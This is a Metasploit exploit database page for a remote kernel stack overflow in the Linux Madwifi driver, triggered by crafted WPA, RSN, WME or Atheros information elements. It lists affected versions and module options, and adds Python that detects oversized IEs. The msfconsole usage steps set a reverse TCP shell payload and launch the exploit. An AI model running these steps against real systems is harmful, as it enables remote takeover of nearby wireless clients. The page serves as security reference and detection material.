Madwifi SIOCGIWSCAN Buffer Overflow | Metasploit Exploit Database (DB)

Madwifi SIOCGIWSCAN Buffer Overflow

The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by a properly crafted information element of one of these types: WPA, RSN, WME or Atheros OUI. The current madwifi driver (0.9.2) and all madwifi-ng drivers since r1504 are vulnerable; the Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable: it doesn't crash the Wifi stack and can exploit the same machine multiple times without the need to reboot it. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
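As an added example (not part of the module or of the madwifi code), the following Python walks the information-element section of a captured 802.11 management frame and flags the IE families named above when an IE is oversized or its declared length overruns the frame. The 64-byte threshold and the sample IE bytes are constructed for this example; the threshold is an assumed sensor setting, not the driver's real buffer size.

```python
# Added example: detection logic for a monitor-mode sensor. It inspects the
# tag/length/value IEs that giwscan_cb() would process and reports the WPA,
# RSN, WME and Atheros vendor IEs that are oversized or malformed.
from typing import List, Tuple

RSN_ID = 48
VENDOR_ID = 221
MS_OUI = b"\x00\x50\xf2"        # WPA (type 1) and WME (type 2) use this OUI
ATHEROS_OUI = b"\x00\x03\x7f"   # Atheros vendor-specific IE

def classify(eid: int, body: bytes) -> str:
    """Name the IE families listed on this page; anything else is 'other'."""
    if eid == RSN_ID:
        return "RSN"
    if eid == VENDOR_ID and len(body) >= 4:
        if body[:3] == MS_OUI and body[3] == 1:
            return "WPA"
        if body[:3] == MS_OUI and body[3] == 2:
            return "WME"
        if body[:3] == ATHEROS_OUI:
            return "Atheros"
    return "other"

def parse_ies(blob: bytes) -> List[Tuple[int, bytes, bool]]:
    """Walk IEs; an IE whose declared length overruns the buffer is marked truncated."""
    out, i = [], 0
    while i + 2 <= len(blob):
        eid, ln = blob[i], blob[i + 1]
        body = blob[i + 2 : i + 2 + ln]
        out.append((eid, body, len(body) < ln))
        i += 2 + ln
    return out

def suspicious_ies(blob: bytes, max_len: int = 64) -> List[str]:
    """Findings for oversized or truncated IEs in the affected families.
    max_len is an assumed sensor threshold, not the driver's stack buffer size."""
    findings = []
    for eid, body, truncated in parse_ies(blob):
        fam = classify(eid, body)
        if fam == "other":
            continue
        if truncated:
            findings.append(f"{fam}: declared length overruns frame")
        elif len(body) > max_len:
            findings.append(f"{fam}: length {len(body)} exceeds {max_len}")
    return findings

# Constructed samples: SSID 'test' (the module's default) plus a normal 24-byte
# WPA IE, and the same frame with a 200-byte Atheros vendor IE appended.
BENIGN = b"\x00\x04test" + b"\xdd\x18" + MS_OUI + b"\x01\x01\x00" + b"\x00" * 18
OVERSIZED = BENIGN + b"\xdd\xc8" + ATHEROS_OUI + b"\x00" * 197
```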

Exploit Rank

  • Average

Exploit Authors

  • Julien Tinnes < julien at cr0.org >
  • Laurent Butti < 0x9090 at gmail.com >

Exploit Targets

  • 0 - Ubuntu 6.10
  • 1 - Generic (you need non randomized vdso)

Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/linux/madwifi/madwifi_giwscan_cb
msf exploit(madwifi_giwscan_cb) > show payloads
msf exploit(madwifi_giwscan_cb) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(madwifi_giwscan_cb) > set LHOST [MY IP ADDRESS]
msf exploit(madwifi_giwscan_cb) > show targets
msf exploit(madwifi_giwscan_cb) > set TARGET [TARGET ID]
msf exploit(madwifi_giwscan_cb) > exploit


Exploit Module Options

  • ADDR_DST - The MAC address of the target system (default: FF:FF:FF:FF:FF:FF)
  • CHANNEL - The initial channel (default: 11)
  • DRIVER - The name of the wireless driver for lorcon (default: autodetect)
  • INTERFACE - The name of the wireless interface (default: wlan0)
  • LENGTH - Length after local variables in giwscan_cb() to overwrite (default: 24)
  • RUNTIME - The number of seconds to run the attack (default: 600)
  • SINGLESHOT - Break after first victim (for msfcli) (default: false)
  • SSID - The SSID of the emulated access point (default: test)
  • ContextInformationFile - The information file that contains context information
  • DisablePayloadHandler - Disable the handler code for the selected payload
  • EnableContextEncoding - Use transient context when encoding payloads
  • VERBOSE - Enable detailed status messages
  • WORKSPACE - Specify the workspace for this module
  • WfsDelay - Additional delay when waiting for a session